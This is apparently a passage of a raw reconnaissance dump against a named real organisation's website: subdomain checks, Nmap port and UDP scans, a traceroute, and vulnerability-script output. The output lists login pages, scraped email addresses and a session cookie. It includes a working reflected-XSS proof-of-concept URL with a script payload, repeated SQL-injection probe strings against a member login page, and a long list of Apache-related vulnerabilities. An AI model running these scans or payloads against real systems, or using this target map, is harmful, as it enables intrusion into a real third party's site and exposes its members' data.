4496[Not Vulnerable] www-web1.pglfe.org
4497[Not Vulnerable] www.webapp.pglfe.org
4498[Not Vulnerable] www-web.pglfe.org
4499[Not Vulnerable] wwwwebapp.pglfe.org
4500[Not Vulnerable] www.web.pglfe.org
4501[Not Vulnerable] wwwweb.pglfe.org
4502[Not Vulnerable] www.westeurope.pglfe.org
4503[Not Vulnerable] www-www3.pglfe.org
4504[Not Vulnerable] wwwwww3.pglfe.org
4505[Not Vulnerable] www.z.pglfe.org
4506[Not Vulnerable] z.www.pglfe.org
4507[Not Vulnerable] z-www.pglfe.org
4508[Not Vulnerable] wwwz.pglfe.org
4509[Not Vulnerable] zwww.pglfe.org
4510#######################################################################################################################################
4511WARNING: Duplicate port number(s) specified. Are you alert enough to be using Nmap? Have some coffee or Jolt(tm).
4512Starting Nmap 7.80 ( https://nmap.org ) at 2019-11-25 08:22 EST
4513Nmap scan report for www.pglfe.org (192.252.144.58)
4514Host is up (0.24s latency).
4515Not shown: 486 filtered ports, 3 closed ports
4516Some closed ports may be reported as filtered due to --defeat-rst-ratelimit
4517PORT STATE SERVICE
451821/tcp open ftp
451980/tcp open http
4520143/tcp open imap
4521443/tcp open https
4522587/tcp open submission
4523993/tcp open imaps
45243306/tcp open mysql
4525
4526Nmap done: 1 IP address (1 host up) scanned in 235.63 seconds
4527#######################################################################################################################################
4528Starting Nmap 7.80 ( https://nmap.org ) at 2019-11-25 08:25 EST
4529Nmap scan report for www.pglfe.org (192.252.144.58)
4530Host is up (0.15s latency).
4531Not shown: 2 filtered ports, 1 closed port
4532PORT STATE SERVICE
453353/udp open|filtered domain
453467/udp open|filtered dhcps
453568/udp open|filtered dhcpc
453669/udp open|filtered tftp
453788/udp open|filtered kerberos-sec
4538123/udp open|filtered ntp
4539139/udp open|filtered netbios-ssn
4540161/udp open|filtered snmp
4541162/udp open|filtered snmptrap
4542389/udp open|filtered ldap
4543500/udp open|filtered isakmp
4544520/udp open|filtered route
4545
4546Nmap done: 1 IP address (1 host up) scanned in 2.58 seconds
4547#######################################################################################################################################
4548Starting Nmap 7.80 ( https://nmap.org ) at 2019-11-25 08:26 EST
4549Nmap scan report for www.pglfe.org (192.252.144.58)
4550Host is up (0.26s latency).
4551
4552PORT STATE SERVICE VERSION
455321/tcp filtered ftp
4554Too many fingerprints match this host to give specific OS details
4555Network Distance: 17 hops
4556
4557TRACEROUTE (using proto 1/icmp)
4558HOP RTT ADDRESS
45591 131.63 ms 10.245.200.1
45602 ...
45613 132.40 ms te0-0-2-1.nr11.b069785-0.tll01.atlas.cogentco.com (149.6.188.49)
45624 132.28 ms be2160.rcr51.tll01.atlas.cogentco.com (154.25.10.249)
45635 137.41 ms be3740.ccr21.sto03.atlas.cogentco.com (154.54.60.190)
45646 159.92 ms be2281.ccr41.ham01.atlas.cogentco.com (154.54.63.1)
45657 167.73 ms be2797.ccr41.fra03.atlas.cogentco.com (154.54.58.225)
45668 164.50 ms be3186.agr41.fra03.atlas.cogentco.com (130.117.0.2)
45679 167.69 ms centurylink.fra03.atlas.cogentco.com (130.117.14.26)
456810 164.59 ms 63-235-41-102.dia.static.qwest.net (63.235.41.102)
456911 259.36 ms cr1-te-0-5-1-0.ft3.savvis.net (204.70.224.158)
457012 260.12 ms 204.70.192.125
457113 254.31 ms cr2-xe-4-0-2.jfk2.savvis.net (206.28.101.9)
457214 259.89 ms msr1-te-0-3-0-0.bos.savvis.net (206.28.97.205)
457315 252.82 ms hr3-xe-8-0.0.bo3.savvis.net (206.28.97.198)
457416 256.28 ms 64.89.38.2
457517 260.39 ms 192.252.144.58
4576#######################################################################################################################################
4577Starting Nmap 7.80 ( https://nmap.org ) at 2019-11-25 08:30 EST
4578NSE: Loaded 163 scripts for scanning.
4579NSE: Script Pre-scanning.
4580Initiating NSE at 08:30
4581Completed NSE at 08:30, 0.00s elapsed
4582Initiating NSE at 08:30
4583Completed NSE at 08:30, 0.00s elapsed
4584Initiating Parallel DNS resolution of 1 host. at 08:30
4585Completed Parallel DNS resolution of 1 host. at 08:30, 0.02s elapsed
4586Initiating SYN Stealth Scan at 08:30
4587Scanning www.pglfe.org (192.252.144.58) [1 port]
4588Discovered open port 80/tcp on 192.252.144.58
4589Completed SYN Stealth Scan at 08:30, 0.28s elapsed (1 total ports)
4590Initiating Service scan at 08:30
4591Scanning 1 service on www.pglfe.org (192.252.144.58)
4592Completed Service scan at 08:30, 6.52s elapsed (1 service on 1 host)
4593Initiating OS detection (try #1) against www.pglfe.org (192.252.144.58)
4594Retrying OS detection (try #2) against www.pglfe.org (192.252.144.58)
4595Initiating Traceroute at 08:30
4596Completed Traceroute at 08:30, 3.02s elapsed
4597Initiating Parallel DNS resolution of 16 hosts. at 08:30
4598Completed Parallel DNS resolution of 16 hosts. at 08:30, 0.24s elapsed
4599NSE: Script scanning 192.252.144.58.
4600Initiating NSE at 08:30
4601Completed NSE at 08:33, 145.33s elapsed
4602Initiating NSE at 08:33
4603Completed NSE at 08:33, 1.09s elapsed
4604Nmap scan report for www.pglfe.org (192.252.144.58)
4605Host is up (0.25s latency).
4606
4607PORT STATE SERVICE VERSION
460880/tcp open http Apache httpd
4609| http-auth-finder:
4610| Spidering limited to: maxdepth=3; maxpagecount=20; withinhost=www.pglfe.org
4611| url method
4612| http://www.pglfe.org:80/pglfe_sec/secretary_login.php FORM
4613| http://www.pglfe.org:80/dgracfe_officers/officer_login.php FORM
4614| http://www.pglfe.org:80/pglfe_doc/doc_login.php FORM
4615|_ http://www.pglfe.org:80/dgracfe_reg/registrar_login.php FORM
4616| http-brute:
4617|_ Path "/" does not require authentication
4618|_http-chrono: Request times for /; avg: 1797.24ms; min: 1635.37ms; max: 2214.28ms
4619| http-csrf:
4620| Spidering limited to: maxdepth=3; maxpagecount=20; withinhost=www.pglfe.org
4621| Found the following possible CSRF vulnerabilities:
4622|
4623| Path: http://www.pglfe.org:80/pglfe_sec/secretary_login.php
4624| Form id: loginbg
4625| Form action: secretary_login.php
4626|
4627| Path: http://www.pglfe.org:80/dgracfe_officers/officer_login.php
4628| Form id: loginbg
4629| Form action: officer_login.php
4630|
4631| Path: http://www.pglfe.org:80/pglfe_doc/doc_login.php
4632| Form id: loginbg
4633| Form action: doc_login.php
4634|
4635| Path: http://www.pglfe.org:80/dgracfe_reg/registrar_login.php
4636| Form id: loginbg
4637|_ Form action: /dgracfe_reg/registrar_login.php
4638|_http-date: Mon, 25 Nov 2019 13:31:07 GMT; -1s from local time.
4639|_http-devframework: Couldn't determine the underlying framework or CMS. Try increasing 'httpspider.maxpagecount' value to spider more pages.
4640|_http-dombased-xss: Couldn't find any DOM based XSS.
4641|_http-drupal-enum: Nothing found amongst the top 100 resources,use --script-args number=<number|all> for deeper analysis)
4642| http-errors:
4643| Spidering limited to: maxpagecount=40; withinhost=www.pglfe.org
4644| Found the following error pages:
4645|
4646| Error Code: 400
4647| http://www.pglfe.org:80
4648|
4649| Error Code: 404
4650| http://www.pglfe.org:80/%0amembers/member_login.php?to_page=articles
4651|
4652| Error Code: 404
4653| http://www.pglfe.org:80/_include/css/style-redish.css
4654|
4655| Error Code: 404
4656| http://www.pglfe.org:80/_include/css/style-dirtyblue.css
4657|
4658| Error Code: 404
4659|_ http://www.pglfe.org:80/%0a%22_include/images/lodges-racs-km-logo/AG1001logofront.jpg%22
4660|_http-exif-spider: ERROR: Script execution failed (use -d to debug)
4661|_http-feed: Couldn't find any feeds.
4662|_http-fetch: Please enter the complete path of the directory to save data in.
4663| http-grep:
4664| (1) http://www.pglfe.org:80/emerald883.php:
4665| (1) email:
4666| + 883sec@pglfe.org
4667| (1) http://www.pglfe.org:80/dgracfe_officers.php:
4668| (1) email:
4669| + dgracregistrar@dgracfeic.org
4670| (1) http://www.pglfe.org:80/badenpowell929.php:
4671| (1) email:
4672| + 929sec@pglfe.org
4673| (1) http://www.pglfe.org:80/pglfe_lodges.php:
4674| (1) email:
4675| + pglsec@pglfe.org
4676| (1) http://www.pglfe.org:80/km_officers_hk.php:
4677| (1) email:
4678|_ + council@freemason.ie
4679| http-headers:
4680| Date: Mon, 25 Nov 2019 13:31:01 GMT
4681| Server: Apache
4682| Expires: Thu, 19 Nov 1981 08:52:00 GMT
4683| Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
4684| Pragma: no-cache
4685| Set-Cookie: pglfesesid=25207dd47c5a77821df47e2e1406d725; path=/
4686| Upgrade: h2
4687| Connection: Upgrade, close
4688| Content-Type: text/html
4689|
4690|_ (Request type: HEAD)
4691|_http-jsonp-detection: Couldn't find any JSONP endpoints.
4692| http-methods:
4693|_ Supported Methods: GET HEAD POST OPTIONS
4694|_http-mobileversion-checker: No mobile version detected.
4695| http-php-version: Logo query returned unknown hash d84a43d08b7ff8f2e2b1314c4f1b7d0a
4696|_Credits query returned unknown hash d84a43d08b7ff8f2e2b1314c4f1b7d0a
4697| http-phpself-xss:
4698| VULNERABLE:
4699| Unsafe use of $_SERVER["PHP_SELF"] in PHP files
4700| State: VULNERABLE (Exploitable)
4701| PHP files are not handling safely the variable $_SERVER["PHP_SELF"] causing Reflected Cross Site Scripting vulnerabilities.
4702|
4703| Extra information:
4704|
4705| Vulnerable files with proof of concept:
4706| http://www.pglfe.org/dgracfe_reg/registrar_login.php/%27%22/%3E%3Cscript%3Ealert(1)%3C/script%3E
4707| Spidering limited to: maxdepth=3; maxpagecount=20; withinhost=www.pglfe.org
4708| References:
4709| https://www.owasp.org/index.php/Cross-site_Scripting_(XSS)
4710|_ http://php.net/manual/en/reserved.variables.server.php
4711| http-security-headers:
4712| Cache_Control:
4713| Header: Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
4714| Pragma:
4715| Header: Pragma: no-cache
4716| Expires:
4717|_ Header: Expires: Thu, 19 Nov 1981 08:52:00 GMT
4718|_http-server-header: Apache
4719| http-sitemap-generator:
4720| Directory structure:
4721| /
4722| Other: 1; php: 5
4723| /_include/css/
4724| css: 1
4725| /_include/images/
4726| jpg: 1; png: 2
4727| /_include/images/lodges-racs-km-logo/
4728| jpg: 3
4729| /_include/js/
4730| js: 5
4731| /pglfe_sec/
4732| php: 1
4733| Longest directory structure:
4734| Depth: 3
4735| Dir: /_include/images/lodges-racs-km-logo/
4736| Total files found (by extension):
4737|_ Other: 1; css: 1; jpg: 4; js: 5; php: 6; png: 2
4738| http-sql-injection:
4739| Possible sqli for queries:
4740| http://www.pglfe.org:80/members/member_login.php?to_page=photos%27%20OR%20sqlspider
4741| http://www.pglfe.org:80/members/member_login.php?to_page=photos%27%20OR%20sqlspider
4742| http://www.pglfe.org:80/members/member_login.php?to_page=photos%27%20OR%20sqlspider
4743| http://www.pglfe.org:80/members/member_login.php?to_page=photos%27%20OR%20sqlspider
4744| http://www.pglfe.org:80/members/member_login.php?to_page=photos%27%20OR%20sqlspider
4745| http://www.pglfe.org:80/members/member_login.php?to_page=photos%27%20OR%20sqlspider
4746| http://www.pglfe.org:80/members/member_login.php?to_page=photos%27%20OR%20sqlspider
4747| http://www.pglfe.org:80/members/member_login.php?to_page=photos%27%20OR%20sqlspider
4748| http://www.pglfe.org:80/members/member_login.php?to_page=photos%27%20OR%20sqlspider
4749| http://www.pglfe.org:80/members/member_login.php?to_page=photos%27%20OR%20sqlspider
4750| http://www.pglfe.org:80/members/member_login.php?to_page=photos%27%20OR%20sqlspider
4751|_ http://www.pglfe.org:80/members/member_login.php?to_page=photos%27%20OR%20sqlspider
4752|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
4753|_http-title: Provincial Grand Lodge of the Far East
4754| http-vhosts:
4755| 126 names had status 403
4756|_www.pglfe.org : 200
4757|_http-vuln-cve2017-1001000: ERROR: Script execution failed (use -d to debug)
4758|_http-wordpress-enum: Nothing found amongst the top 100 resources,use --script-args search-limit=<number|all> for deeper analysis)
4759|_http-wordpress-users: [Error] Wordpress installation was not found. We couldn't find wp-login.php
4760|_http-xssed: No previously reported XSS vuln.
4761| vulscan: VulDB - https://vuldb.com:
4762| [141649] Apache OFBiz up to 16.11.05 Form Widget Freemarker Markup Code Execution
4763| [141648] Apache OFBiz up to 16.11.05 Application Stored cross site scripting
4764| [140386] Apache Commons Beanutils 1.9.2 BeanIntrospector unknown vulnerability
4765| [139708] Apache Ranger up to 1.2.0 Policy Import cross site scripting
4766| [139540] cPanel up to 60.0.24 Apache HTTP Server Key information disclosure
4767| [139386] Apache Tike up to 1.21 RecursiveParserWrapper Stack-based memory corruption
4768| [139385] Apache Tika 1.19/1.20/1.21 SAXParsers Hang denial of service
4769| [139384] Apache Tika up to 1.21 RecursiveParserWrapper ZIP File denial of service
4770| [139261] Apache Solr 8.2.0 DataImportHandler Parameter unknown vulnerability
4771| [139259] cPanel up to 68.0.26 WHM Apache Includes Editor information disclosure
4772| [139256] cPanel up to 68.0.26 WHM Apache Configuration Include Editor cross site scripting
4773| [139239] cPanel up to 70.0.22 Apache HTTP Server Log information disclosure
4774| [139141] Apache ActiveMQ Client up to 5.15.4 ActiveMQConnection.java ActiveMQConnection denial of service
4775| [139130] cPanel up to 73.x Apache HTTP Server Injection privilege escalation
4776| [138914] Venustech Apache VCL 2.1/2.2/2.3/2.4/2.5 VM sql injection
4777| [138913] Venustech Apache VCL 2.1/2.2/2.3/2.4/2.5 Block Argument privilege escalation
4778| [138912] Venustech Apache VCL 2.1/2.2/2.3/2.4/2.5 Cookie sql injection
4779| [138816] Apache Storm up to 1.2.2 Logviewer Daemon Log information disclosure
4780| [138815] Apache Storm up to 1.2.2 UI Daemon Deserialization privilege escalation
4781| [138164] Oracle 2.7.0.1 Apache Log4j unknown vulnerability
4782| [138155] Oracle Agile Engineering Data Management 6.2.0/6.2.1 Apache Tomcat unknown vulnerability
4783| [138151] Oracle Transportation Management 6.3.7 Apache Tomcat unknown vulnerability
4784| [138149] Oracle Agile Engineering Data Management 6.2.0/6.2.1 Apache Commons FileUpload unknown vulnerability
4785| [138131] Oracle MICROS Retail XBRi Loss Prevention 10.8.0/10.8.1/10.8.2/10.8.3 Apache Tomcat unknown vulnerability
4786| [138129] Oracle Retail Xstore Point of Service 7.0/7.1 Apache HTTP Server denial of service
4787| [138123] Oracle Retail Order Management System 5.0 Apache Struts 1 unknown vulnerability
4788| [138122] Oracle Retail Order Broker 5.2/15.0 Apache Tomcat unknown vulnerability
4789| [138121] Oracle Retail Order Broker 5.2/15.0 Apache CXF unknown vulnerability
4790| [138112] Oracle Retail Integration Bus 15.0/16.0 Apache Commons FileUpload unknown vulnerability
4791| [138111] Oracle MICROS Retail XBRi Loss Prevention 10.8.0/10.8.1/10.8.2/10.8.3 Apache Commons FileUpload unknown vulnerability
4792| [138103] Oracle PeopleSoft Enterprise PeopleTools 8.55/8.56/8.57 Apache WSS4J information disclosure
4793| [138053] Oracle JD Edwards EnterpriseOne Tools 9.2 Apache Log4j unknown vulnerability
4794| [138036] Oracle Insurance Rules Palette 10.0/10.1/10.2/11.0 Apache Commons FileUpload unknown vulnerability
4795| [138035] Oracle Insurance Policy Administration J2EE 10.0/10.1/10.2/11.0 Apache Commons FileUpload unknown vulnerability
4796| [138034] Oracle Insurance Calculation Engine 9.7/10.0/10.1/10.2 Apache Commons FileUpload unknown vulnerability
4797| [138028] Oracle Identity Manager 11.1.2.3.0/12.2.1.3.0 Apache Log4j unknown vulnerability
4798| [138020] Oracle BI Publisher 11.1.1.9.0 Apache Tomcat unknown vulnerability
4799| [138019] Oracle BI Publisher (formerly XML Publisher) 11.1.1.9.0 Apache Tomcat unknown vulnerability
4800| [138017] Oracle Outside In Technology 8.5.4 Apache Commons FileUpload unknown vulnerability
4801| [138013] Oracle Outside In Technology 8.5.4 Apache Tomcat unknown vulnerability
4802| [138012] Oracle Outside In Technology 8.5.4 Apache HTTP Server unknown vulnerability
4803| [138009] Oracle Outside In Technology 8.5.4 Apache HTTP Server unknown vulnerability
4804| [138008] Oracle WebLogic Server 10.3.6.0.0/12.1.3.0.0/12.2.1.3.0 Apache Struts 1 denial of service
4805| [138007] Oracle WebCenter Sites 12.2.1.3.0 Apache Tomcat denial of service
4806| [138006] Oracle Enterprise Repository 12.1.3.0.0 Apache CXF denial of service
4807| [138000] Oracle WebCenter Sites 12.2.1.3.0 Apache Commons FileUpload unknown vulnerability
4808| [137999] Oracle WebLogic Server 10.3.6.0.0/12.1.3.0.0/12.2.1.3.0 Apache Commons FileUpload unknown vulnerability
4809| [137995] Oracle Hospitality Simphony 18.2.1 Apache WSS4J information disclosure
4810| [137987] Oracle FLEXCUBE Universal Banking up to 12.0.3/12.4.0/14.2.0 Apache Log4j unknown vulnerability
4811| [137981] Oracle Insurance IFRS 17 Analyzer 8.0.6/8.0.7 Apache Commons FileUpload unknown vulnerability
4812| [137980] Oracle Insurance Data Foundation 8.0.4/8.0.5/8.0.6/8.0.7 Apache Commons FileUpload unknown vulnerability
4813| [137979] Oracle 8.0.8 Apache Commons FileUpload unknown vulnerability
4814| [137973] Oracle 8.0.4/8.0.5/8.0.6/8.0.7 Apache Batik unknown vulnerability
4815| [137970] Oracle Financial Services Profitability Management 8.0.4/8.0.5/8.0.6/8.0.7 Apache ActiveMQ unknown vulnerability
4816| [137967] Oracle up to 8.0.7 Apache httpd unknown vulnerability
4817| [137966] Oracle 8.0.7/8.0.8 Apache Groovy unknown vulnerability
4818| [137965] Oracle Financial Services Liquidity Risk Management 8.0.1/8.0.2/8.0.4/8.0.5/8.0.6 Apache Commons FileUpload unknown vulnerability
4819| [137964] Oracle 8.0.4/8.0.5/8.0.6/8.0.7 Apache Log4j unknown vulnerability
4820| [137933] Oracle Banking Platform up to 2.7.1 Apache Tika unknown vulnerability
4821| [137926] Oracle Enterprise Manager for Fusion Middleware 13.2/13.3 Apache Commons FileUpload information disclosure
4822| [137924] Oracle Enterprise Manager Base Platform 12.1.0.5.0/13.2.0.0.0/13.3.0.0.0 Apache Commons FileUpload unknown vulnerability
4823| [137914] Oracle E-Business Suite up to 12.2.8 Apache ActiveMQ unknown vulnerability
4824| [137913] Oracle E-Business Suite up to 12.2.8 Apache ActiveMQ unknown vulnerability
4825| [137911] Oracle E-Business Suite up to 12.2.8 Apache HTTP Server unknown vulnerability
4826| [137910] Oracle E-Business Suite up to 12.2.8 Apache CXF information disclosure
4827| [137909] Oracle E-Business Suite up to 12.2.8 Apache Commons FileUpload unknown vulnerability
4828| [137905] Oracle Primavera Gateway 15.2/16.2/17.12/18.8 Apache Tika denial of service
4829| [137901] Oracle Primavera Unifier up to 18.8 Apache HTTP Server unknown vulnerability
4830| [137895] Oracle Instant Messaging Server 10.0.1.2.0 Apache Tika information disclosure
4831| [137894] Oracle EAGLE (Software) 46.5/46.6/46.7 Apache Tomcat information disclosure
4832| [137892] Oracle Online Mediation Controller 6.1 Apache Batik denial of service
4833| [137891] Oracle Interactive Session Recorder 6.0/6.1/6.2 Apache Tomcat unknown vulnerability
4834| [137885] Oracle Diameter Signaling Router (DSR) 8.0/8.1/8.2 Apache cxf unknown vulnerability
4835| [137882] Oracle Unified 8.0.0.2.0 Apache Commons FileUpload unknown vulnerability
4836| [137881] Oracle Online Mediation Controller 6.1 Apache Commons FileUpload unknown vulnerability
4837| [137880] Oracle Interactive Session Recorder 6.0/6.1/6.2 Apache Log4j unknown vulnerability
4838| [137879] Oracle Convergence 3.0.2 Apache Commons FileUpload unknown vulnerability
4839| [137876] Oracle Application Session Controller 3.7.1/3.8.0 Apache Commons FileUpload unknown vulnerability
4840| [137829] Apache Roller 5.2.3 Math Comment Authenticator Reflected cross site scripting
4841| [137736] Apache Kafka 0.11.0.0/2.1.0 ACL Validation Request privilege escalation
4842| [136858] MakerBot Replicator 5G Printer Apache HTTP Server information disclosure
4843| [136849] Analogic Poste.io 2.1.6 on Apache RoundCube logs/ information disclosure
4844| [136822] Apache Tomcat up to 8.5.40/9.0.19 Incomplete Fix CVE-2019-0199 Resource Exhaustion denial of service
4845| [136808] Apache Geode up to 1.8.0 Secure Mode privilege escalation
4846| [136646] Apache Allura up to 1.10.x Dropdown Selector Stored cross site scripting
4847| [136374] Apache HTTP Server up to 2.4.38 Slash Regular Expression unknown vulnerability
4848| [136373] Apache HTTP Server 2.4.34/2.4.35/2.4.36/2.4.37/2.4.38 HTTP2 Request Crash denial of service
4849| [136372] Apache HTTP Server up to 2.4.38 HTTP2 Request unknown vulnerability
4850| [136370] Apache Fineract up to 1.2.x sql injection
4851| [136369] Apache Fineract up to 1.2.x sql injection
4852| [135731] Apache Hadoop up to 2.8.4/2.9.1/3.1.0 yarn privilege escalation
4853| [135664] Apache Tomcat up to 7.0.93/8.5.39/9.0.0.17 SSI printenv Command cross site scripting
4854| [135663] Apache Camel up to 2.23.x JSON-lib Library XML Data XML External Entity
4855| [135661] Apache Roller up to 5.2.1/5.2.0 XML-RPC Interface XML File Server-Side Request Forgery
4856| [135402] Apache Zookeeper up to 3.4.13/3.5.0-alpha to 3.5.4-beta getACL() information disclosure
4857| [135270] Apache JSPWiki up to 2.11.0.M3 Plugin Link cross site scripting
4858| [135269] Apache JSPWiki up to 2.11.0.M3 InterWiki Link cross site scripting
4859| [135268] Apache JSPWiki up to 2.11.0.M3 Attachment cross site scripting
4860| [134527] Apache Karaf up to 4.2.4 Config Service directory traversal
4861| [134416] Apache Sanselan 0.97-incubator Loop denial of service
4862| [134415] Apache Sanselan 0.97-incubator Hang denial of service
4863| [134291] Apache Axis up to 1.7.8 Server-Side Request Forgery
4864| [134290] Apache UIMA DUCC up to 2.2.2 cross site scripting
4865| [134248] Apache Archiva up to 2.2.3 Artifact Upload directory traversal
4866| [134247] Apache Archiva up to 2.2.3 Artifact Upload directory traversal
4867| [134246] Apache Camel up to 2.19/2.21.3/2.22.2/2.23.0 directory traversal
4868| [134138] Apache Pluto 3.0.0/3.0.1 Chat Room Demo Portlet cross site scripting
4869| [133992] Apache Qpid Proton up to 0.27.0 Certificate Validation Man-in-the-Middle weak authentication
4870| [133977] Apache Zeppelin up to 0.7.x Stored cross site scripting
4871| [133976] Apache Zeppelin up to 0.7.x Cron Scheduler privilege escalation
4872| [133975] Apache Zeppelin up to 0.7.2 Session Fixation weak authentication
4873| [133444] Apache PDFbox 2.0.14 XML Parser XML External Entity
4874| [133573] Oracle FLEXCUBE Private Banking 2.0.0.0/2.2.0.1/12.0.1.0/12.0.3.0/12.1.0.0 Apache ActiveMQ unknown vulnerability
4875| [133407] Apache Tomcat up to 7.0.93/8.5.39/9.0.17 on Windows JRE Command Line Argument Code Execution
4876| [133315] Apache Airflow up to 1.10.2 HTTP Endpoint cross site request forgery
4877| [133314] Apache Airflow up to 1.10.2 Metadata Database cross site scripting
4878| [133290] Apache Tomcat up to 8.5.37/9.0.14 HTTP2 Stream Execution denial of service
4879| [133112] Apache HTTP Server up to 2.4.38 mod_auth_digest race condition privilege escalation
4880| [133111] Apache HTTP Server 2.4.37/2.4.38 mod_ssl Bypass privilege escalation
4881| [133092] Airsonic 10.2.1 org.apache.commons.lang.RandomStringUtils RecoverController.java java.util.Random weak authentication
4882| [132568] Apache JSPWiki up to 2.11.0.M2 URL User information disclosure
4883| [132567] Apache JSPWiki up to 2.11.0.M2 URL cross site scripting
4884| [132566] Apache ActiveMQ up to 5.15.8 MQTT Frame Memory denial of service
4885| [132565] Apache HBase up to 2.1.3 REST Server Request privilege escalation
4886| [132183] Apache Mesos up to pre-1.4.x Docker Image Code Execution
4887| [131988] Apache Karaf up to 4.2.2 kar Deployer directory traversal
4888| [131859] Apache Hadoop up to 2.9.1 privilege escalation
4889| [131479] Apache Solr up to 7.6 HTTP GET Request Server-Side Request Forgery
4890| [131446] Apache Solr up to 5.0.5/6.6.5 Config API HTTP POST Request Code Execution
4891| [131385] Apache Qpid Broker-J up to 6.x/7.0.6/7.1.0 AMQP Command Crash denial of service
4892| [131315] Apache Mesos up to pre-1.4.x Mesos Masters Rendering JSON Payload Recursion denial of service
4893| [131236] Apache Airflow up to 1.10.1 Metadata Database cross site scripting
4894| [130755] Apache JSPWiki up to 2.10.5 URL cross site scripting
4895| [130629] Apache Guacamole Cookie Flag weak encryption
4896| [130628] Apache Hadoop up to 3.0.0 HDFS information disclosure
4897| [130529] Apache Subversion 1.10.0/1.10.1/1.10.2/1.10.3/1.11.0 mod_dav_svn Directory Crash denial of service
4898| [130353] Apache Open Office up to 4.1.5 Document Loader String memory corruption
4899| [130341] Apache HTTP Server 2.4.37 mod_ssl Loop denial of service
4900| [130330] Apache HTTP Server up to 2.4.37 mod_session Expired privilege escalation
4901| [130329] Apache HTTP Server 2.4.37 mod_http2 Slowloris denial of service
4902| [130212] Apache Airflow up to 1.10.0 LDAP Auth Backend Certificate weak authentication
4903| [130123] Apache Airflow up to 1.8.2 information disclosure
4904| [130122] Apache Airflow up to 1.8.2 command injection cross site request forgery
4905| [130121] Apache Airflow up to 1.8.2 Webserver Object Code Execution
4906| [129717] Oracle Secure Global Desktop 5.4 Apache HTTP Server denial of service
4907| [129688] Oracle Tape Library ACSLS 8.4 Apache Log4j unknown vulnerability
4908| [129673] Oracle Retail Returns Management 13.3/13.4/14.0/14.1 Apache Commons Fileupload unknown vulnerability
4909| [129672] Oracle Retail Central Office 13.3/13.4/14.0/14.1 Apache Commons Fileupload unknown vulnerability
4910| [129671] Oracle Retail Back Office 13.3/13.4/14.0/14.1 Apache Commons Fileupload unknown vulnerability
4911| [129574] Oracle Outside In Technology 8.5.3/8.5.4 Apache Tomcat denial of service
4912| [129573] Oracle WebLogic Server 10.3.6.0 Apache HTTP Server denial of service
4913| [129563] Oracle Enterprise Repository 12.1.3.0.0 Apache Log4j unknown vulnerability
4914| [129555] Oracle Outside In Technology 8.5.3 Apache Batik denial of service
4915| [129551] Oracle Outside In Technology 8.5.3/8.5.4 Apache Commons FileUpload denial of service
4916| [129542] Oracle API Gateway 11.1.2.4.0 Apache Batik denial of service
4917| [129538] Oracle SOA Suite 12.1.3.0.0/12.2.1.3.0 Apache Batik unknown vulnerability
4918| [129519] Oracle Enterprise Manager Ops Center 12.2.2/12.3.3 Apache ActiveMQ unknown vulnerability
4919| [129508] Oracle Applications Manager up to 12.2.8 Apache Derby unknown vulnerability
4920| [129507] Oracle Mobile Field Service up to 12.2.8 Apache Log4j unknown vulnerability
4921| [129505] Oracle Email Center up to 12.2.8 Apache Log4j unknown vulnerability
4922| [129504] Oracle CRM Technical Foundation up to 12.2.8 Apache Commons FileUpload unknown vulnerability
4923| [129499] Oracle Partner Management up to 12.2.8 Apache Log4j unknown vulnerability
4924| [129498] Oracle Marketing up to 12.2.8 Apache Commons FileUpload unknown vulnerability
4925| [129480] Oracle Communications WebRTC Session Controller up to 7.1 Apache Batik unknown vulnerability
4926| [129479] Oracle Communications Diameter Signaling Router up to 8.2 Apache Batik unknown vulnerability
4927| [129474] Oracle Communications Diameter Signaling Router up to 8.2 Apache HTTP Server information disclosure
4928| [129472] Oracle Communications WebRTC Session Controller up to 7.1 Apache Struts 1 unknown vulnerability
4929| [129470] Oracle Communications Converged Application Server up to 7.0.0.0 Apache Struts 1 unknown vulnerability
4930| [129463] Oracle Communications WebRTC Session Controller up to 7.1 Apache Log4j unknown vulnerability
4931| [129461] Oracle Communications Services Gatekeeper up to 6.1.0.3.x Apache Commons Collections Fileupload unknown vulnerability
4932| [129460] Oracle Communications Service Broker 6.0 Apache Log4j unknown vulnerability
4933| [129459] Oracle Communications Policy Management up to 12.4 Apache Struts 2 unknown vulnerability
4934| [129458] Oracle Communications Online Mediation Controller 6.1 Apache Log4j unknown vulnerability
4935| [129457] Oracle Communications Diameter Signaling Router up to 8.2 Apache Commons Fileupload unknown vulnerability
4936| [129456] Oracle Communications Converged Application Server 6.1 Apache Log4j unknown vulnerability
4937| [128714] Apache Thrift Java Client Library up to 0.11.0 SASL Negotiation org.apache.thrift.transport.TSaslTransport unknown vulnerability
4938| [128713] Apache Thrift Node.js Static Web Server up to 0.11.0 directory traversal
4939| [128709] Apache Karaf up to 4.1.6/4.2.1 Features Deployer XMLInputFactory XML External Entity
4940| [128575] Apache NetBeans 9.0 Proxy Auto-Config Code Execution
4941| [128369] Apache Tika 1.8-1.19.1 SQLite3Parser Loop sql injection
4942| [128111] Apache NiFi 1.8.0 Template Upload Man-in-the-Middle cross site request forgery
4943| [128110] Apache NiFi 1.8.0 Cluster Request privilege escalation
4944| [128109] Apache NiFi 1.8.0 Error Page message-page.jsp Request Header cross site scripting
4945| [128108] Apache NiFi up to 1.7.x X-Frame-Options Header privilege escalation
4946| [128102] Apache Oozie up to 5.0.0 Workflow XML Impersonation spoofing
4947| [127994] WordPress up to 5.0.0 on Apache httpd MIME Restriction cross site scripting
4948| [127981] Apache OFBiz 16.11.01/16.11.02/16.11.03/16.11.04 HTTP Engine httpService GET Request privilege escalation
4949| [127161] Apache Hadoop 2.7.4/2.7.5/2.7.6 Incomplete Fix CVE-2016-6811 privilege escalation
4950| [127040] Loadbalancer.org Enterprise VA MAX up to 8.3.2 Apache HTTP Server Log cross site scripting
4951| [127007] Apache Spark Request Code Execution
4952| [126791] Apache Hadoop up to 0.23.11/2.7.6/2.8.4/2.9.1/3.0.2 ZIP File unknown vulnerability
4953| [126767] Apache Qpid Proton-J Transport 0.3 Certificate Verification Man-in-the-Middle weak authentication
4954| [126896] Apache Commons FileUpload 1.3.3 on LDAP Manager DiskFileItem File privilege escalation
4955| [126574] Apache Hive up to 2.3.3/3.1.0 Query privilege escalation
4956| [126573] Apache Hive up to 2.3.3/3.1.0 HiveServer2 privilege escalation
4957| [126564] Apache Superset up to 0.22 Pickle Library load Code Execution
4958| [126488] Apache Syncope up to 2.0.10/2.1.1 BPMN Definition xxe privilege escalation
4959| [126487] Apache Syncope up to 2.0.10/2.1.1 cross site scripting
4960| [126346] Apache Tomcat Path privilege escalation
